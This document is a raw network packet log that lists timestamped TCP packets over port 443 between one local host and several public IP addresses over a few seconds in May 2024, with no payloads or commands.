May 24, 2024 00:29:15.400270939 CEST	443	49741	13.107.213.45	192.168.2.4
May 24, 2024 00:29:15.400365114 CEST	49741	443	192.168.2.4	13.107.213.45
May 24, 2024 00:29:15.400692940 CEST	49742	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:15.400732994 CEST	443	49742	152.199.23.37	192.168.2.4
May 24, 2024 00:29:15.400778055 CEST	49742	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:15.401177883 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:15.401199102 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:15.401451111 CEST	49741	443	192.168.2.4	13.107.213.45
May 24, 2024 00:29:15.401492119 CEST	443	49741	13.107.213.45	192.168.2.4
May 24, 2024 00:29:15.401993990 CEST	49742	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:15.402005911 CEST	443	49742	152.199.23.37	192.168.2.4
May 24, 2024 00:29:15.884728909 CEST	49675	443	192.168.2.4	173.222.162.32
May 24, 2024 00:29:15.943224907 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:15.943499088 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:15.943520069 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:15.944520950 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:15.944772005 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.051620960 CEST	443	49741	13.107.213.45	192.168.2.4
May 24, 2024 00:29:16.051992893 CEST	49741	443	192.168.2.4	13.107.213.45
May 24, 2024 00:29:16.052056074 CEST	443	49741	13.107.213.45	192.168.2.4
May 24, 2024 00:29:16.053080082 CEST	443	49741	13.107.213.45	192.168.2.4
May 24, 2024 00:29:16.053215981 CEST	49741	443	192.168.2.4	13.107.213.45
May 24, 2024 00:29:16.110348940 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.110534906 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.110563040 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.110897064 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.111236095 CEST	49741	443	192.168.2.4	13.107.213.45
May 24, 2024 00:29:16.111236095 CEST	49741	443	192.168.2.4	13.107.213.45
May 24, 2024 00:29:16.111326933 CEST	443	49741	13.107.213.45	192.168.2.4
May 24, 2024 00:29:16.111413002 CEST	443	49741	13.107.213.45	192.168.2.4
May 24, 2024 00:29:16.155118942 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.155179024 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.155225992 CEST	49741	443	192.168.2.4	13.107.213.45
May 24, 2024 00:29:16.155284882 CEST	443	49741	13.107.213.45	192.168.2.4
May 24, 2024 00:29:16.195390940 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.195470095 CEST	49741	443	192.168.2.4	13.107.213.45
May 24, 2024 00:29:16.205640078 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.247478008 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.257204056 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.257211924 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.257256031 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.257266045 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.257289886 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.257301092 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.257344007 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.257385969 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.257385969 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.257410049 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.341572046 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.341600895 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.341687918 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.341687918 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.341720104 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.341756105 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.341820002 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.341820955 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.374517918 CEST	49743	443	192.168.2.4	142.250.184.228
May 24, 2024 00:29:16.374547005 CEST	443	49743	142.250.184.228	192.168.2.4
May 24, 2024 00:29:16.374661922 CEST	49743	443	192.168.2.4	142.250.184.228
May 24, 2024 00:29:16.376869917 CEST	49743	443	192.168.2.4	142.250.184.228
May 24, 2024 00:29:16.376882076 CEST	443	49743	142.250.184.228	192.168.2.4
May 24, 2024 00:29:16.377103090 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.377125025 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.377249956 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.377312899 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.377397060 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.395940065 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.395987988 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.396038055 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.396068096 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.396096945 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.396255016 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.399213076 CEST	443	49742	152.199.23.37	192.168.2.4
May 24, 2024 00:29:16.399578094 CEST	49742	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:16.399586916 CEST	443	49742	152.199.23.37	192.168.2.4
May 24, 2024 00:29:16.400610924 CEST	443	49742	152.199.23.37	192.168.2.4
May 24, 2024 00:29:16.400768995 CEST	49742	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:16.402544022 CEST	49742	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:16.402544975 CEST	49742	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:16.402554989 CEST	443	49742	152.199.23.37	192.168.2.4
May 24, 2024 00:29:16.402606964 CEST	443	49742	152.199.23.37	192.168.2.4
May 24, 2024 00:29:16.411199093 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.411252975 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.411305904 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.411319971 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.411350965 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.411477089 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.413239002 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.413326025 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.413338900 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.413393021 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.414531946 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.414547920 CEST	443	49740	151.101.194.137	192.168.2.4
May 24, 2024 00:29:16.414573908 CEST	49740	443	192.168.2.4	151.101.194.137
May 24, 2024 00:29:16.453720093 CEST	49744	443	192.168.2.4	13.107.213.45
May 24, 2024 00:29:16.453730106 CEST	49745	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:16.453753948 CEST	443	49744	13.107.213.45	192.168.2.4
May 24, 2024 00:29:16.453773022 CEST	443	49745	152.199.23.37	192.168.2.4
May 24, 2024 00:29:16.453835011 CEST	49744	443	192.168.2.4	13.107.213.45
May 24, 2024 00:29:16.453839064 CEST	49745	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:16.454310894 CEST	49742	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:16.454323053 CEST	443	49742	152.199.23.37	192.168.2.4
May 24, 2024 00:29:16.466047049 CEST	49744	443	192.168.2.4	13.107.213.45
May 24, 2024 00:29:16.466053009 CEST	49745	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:16.466068983 CEST	443	49744	13.107.213.45	192.168.2.4
May 24, 2024 00:29:16.466070890 CEST	443	49745	152.199.23.37	192.168.2.4
May 24, 2024 00:29:16.502052069 CEST	49742	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:16.540035963 CEST	443	49741	13.107.213.45	192.168.2.4
May 24, 2024 00:29:16.540127039 CEST	443	49741	13.107.213.45	192.168.2.4
May 24, 2024 00:29:16.540209055 CEST	49741	443	192.168.2.4	13.107.213.45
May 24, 2024 00:29:16.544559956 CEST	49741	443	192.168.2.4	13.107.213.45
May 24, 2024 00:29:16.544591904 CEST	443	49741	13.107.213.45	192.168.2.4
May 24, 2024 00:29:16.663930893 CEST	443	49742	152.199.23.37	192.168.2.4
May 24, 2024 00:29:16.665283918 CEST	443	49742	152.199.23.37	192.168.2.4
May 24, 2024 00:29:16.665338039 CEST	49742	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:16.665342093 CEST	443	49742	152.199.23.37	192.168.2.4
May 24, 2024 00:29:16.665402889 CEST	49742	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:16.688319921 CEST	49742	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:16.688333035 CEST	443	49742	152.199.23.37	192.168.2.4
May 24, 2024 00:29:16.700201988 CEST	49747	443	192.168.2.4	13.107.213.67
May 24, 2024 00:29:16.700244904 CEST	443	49747	13.107.213.67	192.168.2.4
May 24, 2024 00:29:16.700758934 CEST	49747	443	192.168.2.4	13.107.213.67
May 24, 2024 00:29:16.701704025 CEST	49747	443	192.168.2.4	13.107.213.67
May 24, 2024 00:29:16.701736927 CEST	443	49747	13.107.213.67	192.168.2.4
May 24, 2024 00:29:16.708352089 CEST	49748	443	192.168.2.4	2.18.97.153
May 24, 2024 00:29:16.708374023 CEST	443	49748	2.18.97.153	192.168.2.4
May 24, 2024 00:29:16.708477974 CEST	49748	443	192.168.2.4	2.18.97.153
May 24, 2024 00:29:16.710345030 CEST	49748	443	192.168.2.4	2.18.97.153
May 24, 2024 00:29:16.710371971 CEST	443	49748	2.18.97.153	192.168.2.4
May 24, 2024 00:29:16.712997913 CEST	49749	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:16.713021994 CEST	443	49749	152.199.23.37	192.168.2.4
May 24, 2024 00:29:16.713337898 CEST	49749	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:16.715173006 CEST	49749	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:16.715183973 CEST	443	49749	152.199.23.37	192.168.2.4
May 24, 2024 00:29:16.863297939 CEST	49750	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:16.863337994 CEST	443	49750	148.72.158.229	192.168.2.4
May 24, 2024 00:29:16.863663912 CEST	49750	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:16.867597103 CEST	49750	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:16.867608070 CEST	443	49750	148.72.158.229	192.168.2.4
May 24, 2024 00:29:17.080173969 CEST	443	49743	142.250.184.228	192.168.2.4
May 24, 2024 00:29:17.080445051 CEST	49743	443	192.168.2.4	142.250.184.228
May 24, 2024 00:29:17.080456972 CEST	443	49743	142.250.184.228	192.168.2.4
May 24, 2024 00:29:17.081456900 CEST	443	49743	142.250.184.228	192.168.2.4
May 24, 2024 00:29:17.081520081 CEST	49743	443	192.168.2.4	142.250.184.228
May 24, 2024 00:29:17.209645033 CEST	443	49744	13.107.213.45	192.168.2.4
May 24, 2024 00:29:17.209846020 CEST	49744	443	192.168.2.4	13.107.213.45
May 24, 2024 00:29:17.209872961 CEST	443	49744	13.107.213.45	192.168.2.4
May 24, 2024 00:29:17.210443020 CEST	443	49744	13.107.213.45	192.168.2.4
May 24, 2024 00:29:17.210721016 CEST	49744	443	192.168.2.4	13.107.213.45
May 24, 2024 00:29:17.210836887 CEST	443	49744	13.107.213.45	192.168.2.4
May 24, 2024 00:29:17.210903883 CEST	49744	443	192.168.2.4	13.107.213.45
May 24, 2024 00:29:17.258517027 CEST	443	49744	13.107.213.45	192.168.2.4
May 24, 2024 00:29:17.351061106 CEST	443	49744	13.107.213.45	192.168.2.4
May 24, 2024 00:29:17.351134062 CEST	443	49744	13.107.213.45	192.168.2.4
May 24, 2024 00:29:17.351368904 CEST	49744	443	192.168.2.4	13.107.213.45
May 24, 2024 00:29:17.376194000 CEST	49744	443	192.168.2.4	13.107.213.45
May 24, 2024 00:29:17.376223087 CEST	443	49744	13.107.213.45	192.168.2.4
May 24, 2024 00:29:17.380964994 CEST	443	49748	2.18.97.153	192.168.2.4
May 24, 2024 00:29:17.381072998 CEST	49748	443	192.168.2.4	2.18.97.153
May 24, 2024 00:29:17.390124083 CEST	49748	443	192.168.2.4	2.18.97.153
May 24, 2024 00:29:17.390147924 CEST	443	49748	2.18.97.153	192.168.2.4
May 24, 2024 00:29:17.390429020 CEST	443	49748	2.18.97.153	192.168.2.4
May 24, 2024 00:29:17.420074940 CEST	443	49747	13.107.213.67	192.168.2.4
May 24, 2024 00:29:17.420129061 CEST	443	49745	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.448661089 CEST	49748	443	192.168.2.4	2.18.97.153
May 24, 2024 00:29:17.460026979 CEST	49745	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:17.460053921 CEST	443	49745	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.461173058 CEST	49747	443	192.168.2.4	13.107.213.67
May 24, 2024 00:29:17.461234093 CEST	443	49747	13.107.213.67	192.168.2.4
May 24, 2024 00:29:17.461510897 CEST	443	49745	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.462470055 CEST	443	49747	13.107.213.67	192.168.2.4
May 24, 2024 00:29:17.462503910 CEST	49743	443	192.168.2.4	142.250.184.228
May 24, 2024 00:29:17.462568998 CEST	49747	443	192.168.2.4	13.107.213.67
May 24, 2024 00:29:17.462625027 CEST	443	49743	142.250.184.228	192.168.2.4
May 24, 2024 00:29:17.465331078 CEST	49745	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:17.465524912 CEST	443	49745	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.468810081 CEST	49747	443	192.168.2.4	13.107.213.67
May 24, 2024 00:29:17.468897104 CEST	443	49747	13.107.213.67	192.168.2.4
May 24, 2024 00:29:17.472079992 CEST	49745	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:17.472495079 CEST	49747	443	192.168.2.4	13.107.213.67
May 24, 2024 00:29:17.472506046 CEST	443	49747	13.107.213.67	192.168.2.4
May 24, 2024 00:29:17.501436949 CEST	443	49750	148.72.158.229	192.168.2.4
May 24, 2024 00:29:17.503685951 CEST	49743	443	192.168.2.4	142.250.184.228
May 24, 2024 00:29:17.503699064 CEST	443	49743	142.250.184.228	192.168.2.4
May 24, 2024 00:29:17.518501043 CEST	443	49745	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.520028114 CEST	49747	443	192.168.2.4	13.107.213.67
May 24, 2024 00:29:17.546516895 CEST	49750	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:17.547172070 CEST	49743	443	192.168.2.4	142.250.184.228
May 24, 2024 00:29:17.556494951 CEST	49750	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:17.556510925 CEST	443	49750	148.72.158.229	192.168.2.4
May 24, 2024 00:29:17.557742119 CEST	443	49750	148.72.158.229	192.168.2.4
May 24, 2024 00:29:17.557816029 CEST	49750	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:17.600214005 CEST	49748	443	192.168.2.4	2.18.97.153
May 24, 2024 00:29:17.608283043 CEST	49750	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:17.608483076 CEST	443	49750	148.72.158.229	192.168.2.4
May 24, 2024 00:29:17.609261990 CEST	49750	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:17.609271049 CEST	443	49750	148.72.158.229	192.168.2.4
May 24, 2024 00:29:17.630223989 CEST	443	49747	13.107.213.67	192.168.2.4
May 24, 2024 00:29:17.630296946 CEST	443	49747	13.107.213.67	192.168.2.4
May 24, 2024 00:29:17.630479097 CEST	49747	443	192.168.2.4	13.107.213.67
May 24, 2024 00:29:17.646505117 CEST	443	49748	2.18.97.153	192.168.2.4
May 24, 2024 00:29:17.652273893 CEST	443	49749	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.656538010 CEST	49750	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:17.674177885 CEST	49749	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:17.674189091 CEST	443	49749	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.675829887 CEST	443	49749	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.675889969 CEST	49749	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:17.677721024 CEST	49749	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:17.677819967 CEST	443	49749	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.678055048 CEST	49749	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:17.678061008 CEST	443	49749	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.711268902 CEST	443	49745	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.716051102 CEST	443	49745	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.716133118 CEST	49745	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:17.716159105 CEST	443	49745	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.716207981 CEST	443	49745	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.716257095 CEST	49745	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:17.716279984 CEST	49747	443	192.168.2.4	13.107.213.67
May 24, 2024 00:29:17.716347933 CEST	443	49747	13.107.213.67	192.168.2.4
May 24, 2024 00:29:17.721338034 CEST	49749	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:17.741647005 CEST	49745	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:17.741666079 CEST	443	49745	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.795937061 CEST	443	49748	2.18.97.153	192.168.2.4
May 24, 2024 00:29:17.796019077 CEST	443	49748	2.18.97.153	192.168.2.4
May 24, 2024 00:29:17.796241999 CEST	49748	443	192.168.2.4	2.18.97.153
May 24, 2024 00:29:17.855665922 CEST	443	49750	148.72.158.229	192.168.2.4
May 24, 2024 00:29:17.855741978 CEST	443	49750	148.72.158.229	192.168.2.4
May 24, 2024 00:29:17.855791092 CEST	49750	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:17.889415026 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:17.889461040 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:17.889520884 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:17.890028954 CEST	49750	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:17.890054941 CEST	443	49750	148.72.158.229	192.168.2.4
May 24, 2024 00:29:17.896945953 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:17.896962881 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:17.916204929 CEST	49748	443	192.168.2.4	2.18.97.153
May 24, 2024 00:29:17.916204929 CEST	49748	443	192.168.2.4	2.18.97.153
May 24, 2024 00:29:17.916280985 CEST	443	49748	2.18.97.153	192.168.2.4
May 24, 2024 00:29:17.916312933 CEST	443	49748	2.18.97.153	192.168.2.4
May 24, 2024 00:29:17.936310053 CEST	443	49749	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.941935062 CEST	443	49749	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.941992044 CEST	49749	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:17.942001104 CEST	443	49749	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.942013979 CEST	443	49749	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.942039967 CEST	49749	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:17.942058086 CEST	49749	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:17.942343950 CEST	49749	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:17.942353010 CEST	443	49749	152.199.23.37	192.168.2.4
May 24, 2024 00:29:17.965636015 CEST	49752	443	192.168.2.4	2.18.97.153
May 24, 2024 00:29:17.965648890 CEST	443	49752	2.18.97.153	192.168.2.4
May 24, 2024 00:29:17.965708971 CEST	49752	443	192.168.2.4	2.18.97.153
May 24, 2024 00:29:17.966254950 CEST	49752	443	192.168.2.4	2.18.97.153
May 24, 2024 00:29:17.966263056 CEST	443	49752	2.18.97.153	192.168.2.4
May 24, 2024 00:29:18.034466028 CEST	49753	443	192.168.2.4	13.107.213.67
May 24, 2024 00:29:18.034524918 CEST	443	49753	13.107.213.67	192.168.2.4
May 24, 2024 00:29:18.034596920 CEST	49753	443	192.168.2.4	13.107.213.67
May 24, 2024 00:29:18.044246912 CEST	49753	443	192.168.2.4	13.107.213.67
May 24, 2024 00:29:18.044264078 CEST	443	49753	13.107.213.67	192.168.2.4
May 24, 2024 00:29:18.045692921 CEST	49754	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:18.045761108 CEST	443	49754	152.199.23.37	192.168.2.4
May 24, 2024 00:29:18.045825005 CEST	49754	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:18.046118021 CEST	49754	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:18.046140909 CEST	443	49754	152.199.23.37	192.168.2.4
May 24, 2024 00:29:18.429368973 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.484137058 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:18.488795042 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:18.488810062 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.489442110 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.493206024 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:18.493279934 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.493849993 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:18.538503885 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.555655956 CEST	49756	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:18.555674076 CEST	443	49756	148.72.158.229	192.168.2.4
May 24, 2024 00:29:18.555721998 CEST	49756	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:18.556150913 CEST	49756	443	192.168.2.4	148.72.158.229
May 24, 2024 00:29:18.556175947 CEST	443	49756	148.72.158.229	192.168.2.4
May 24, 2024 00:29:18.621671915 CEST	443	49752	2.18.97.153	192.168.2.4
May 24, 2024 00:29:18.621743917 CEST	49752	443	192.168.2.4	2.18.97.153
May 24, 2024 00:29:18.657046080 CEST	49752	443	192.168.2.4	2.18.97.153
May 24, 2024 00:29:18.657062054 CEST	443	49752	2.18.97.153	192.168.2.4
May 24, 2024 00:29:18.657428026 CEST	443	49752	2.18.97.153	192.168.2.4
May 24, 2024 00:29:18.658430099 CEST	49752	443	192.168.2.4	2.18.97.153
May 24, 2024 00:29:18.698543072 CEST	443	49752	2.18.97.153	192.168.2.4
May 24, 2024 00:29:18.760164022 CEST	443	49753	13.107.213.67	192.168.2.4
May 24, 2024 00:29:18.760409117 CEST	49753	443	192.168.2.4	13.107.213.67
May 24, 2024 00:29:18.760425091 CEST	443	49753	13.107.213.67	192.168.2.4
May 24, 2024 00:29:18.760751963 CEST	443	49753	13.107.213.67	192.168.2.4
May 24, 2024 00:29:18.761059046 CEST	49753	443	192.168.2.4	13.107.213.67
May 24, 2024 00:29:18.761126041 CEST	443	49753	13.107.213.67	192.168.2.4
May 24, 2024 00:29:18.761365891 CEST	49753	443	192.168.2.4	13.107.213.67
May 24, 2024 00:29:18.762245893 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.762312889 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.762505054 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:18.762511015 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.767028093 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.767332077 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:18.767338037 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.774254084 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.774290085 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.774483919 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:18.774487972 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.774537086 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:18.777662992 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.781552076 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.781594992 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.781689882 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:18.781704903 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.781804085 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:18.792610884 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.806507111 CEST	443	49753	13.107.213.67	192.168.2.4
May 24, 2024 00:29:18.843022108 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:18.843030930 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.859432936 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.859472990 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.859491110 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:18.859498024 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.859631062 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:18.861079931 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.862725973 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.862849951 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:18.862855911 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.864379883 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.864440918 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:18.864442110 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.864543915 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:18.864727974 CEST	49751	443	192.168.2.4	104.18.2.35
May 24, 2024 00:29:18.864739895 CEST	443	49751	104.18.2.35	192.168.2.4
May 24, 2024 00:29:18.911209106 CEST	443	49753	13.107.213.67	192.168.2.4
May 24, 2024 00:29:18.911288977 CEST	443	49753	13.107.213.67	192.168.2.4
May 24, 2024 00:29:18.911340952 CEST	49753	443	192.168.2.4	13.107.213.67
May 24, 2024 00:29:18.911889076 CEST	49753	443	192.168.2.4	13.107.213.67
May 24, 2024 00:29:18.911911011 CEST	443	49753	13.107.213.67	192.168.2.4
May 24, 2024 00:29:18.920710087 CEST	443	49752	2.18.97.153	192.168.2.4
May 24, 2024 00:29:18.920767069 CEST	443	49752	2.18.97.153	192.168.2.4
May 24, 2024 00:29:18.920895100 CEST	49752	443	192.168.2.4	2.18.97.153
May 24, 2024 00:29:18.926419973 CEST	49752	443	192.168.2.4	2.18.97.153
May 24, 2024 00:29:18.926439047 CEST	443	49752	2.18.97.153	192.168.2.4
May 24, 2024 00:29:18.926465988 CEST	49752	443	192.168.2.4	2.18.97.153
May 24, 2024 00:29:18.926475048 CEST	443	49752	2.18.97.153	192.168.2.4
May 24, 2024 00:29:19.012065887 CEST	443	49754	152.199.23.37	192.168.2.4
May 24, 2024 00:29:19.012335062 CEST	49754	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:19.012362957 CEST	443	49754	152.199.23.37	192.168.2.4
May 24, 2024 00:29:19.013880968 CEST	443	49754	152.199.23.37	192.168.2.4
May 24, 2024 00:29:19.014209986 CEST	49754	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:19.014429092 CEST	49754	443	192.168.2.4	152.199.23.37
May 24, 2024 00:29:19.014436960 CEST	443	49754	152.199.23.37	192.168.2.4
May 24, 2024 00:29:19.054502964 CEST	443	49754	152.199.23.37	192.168.2.4
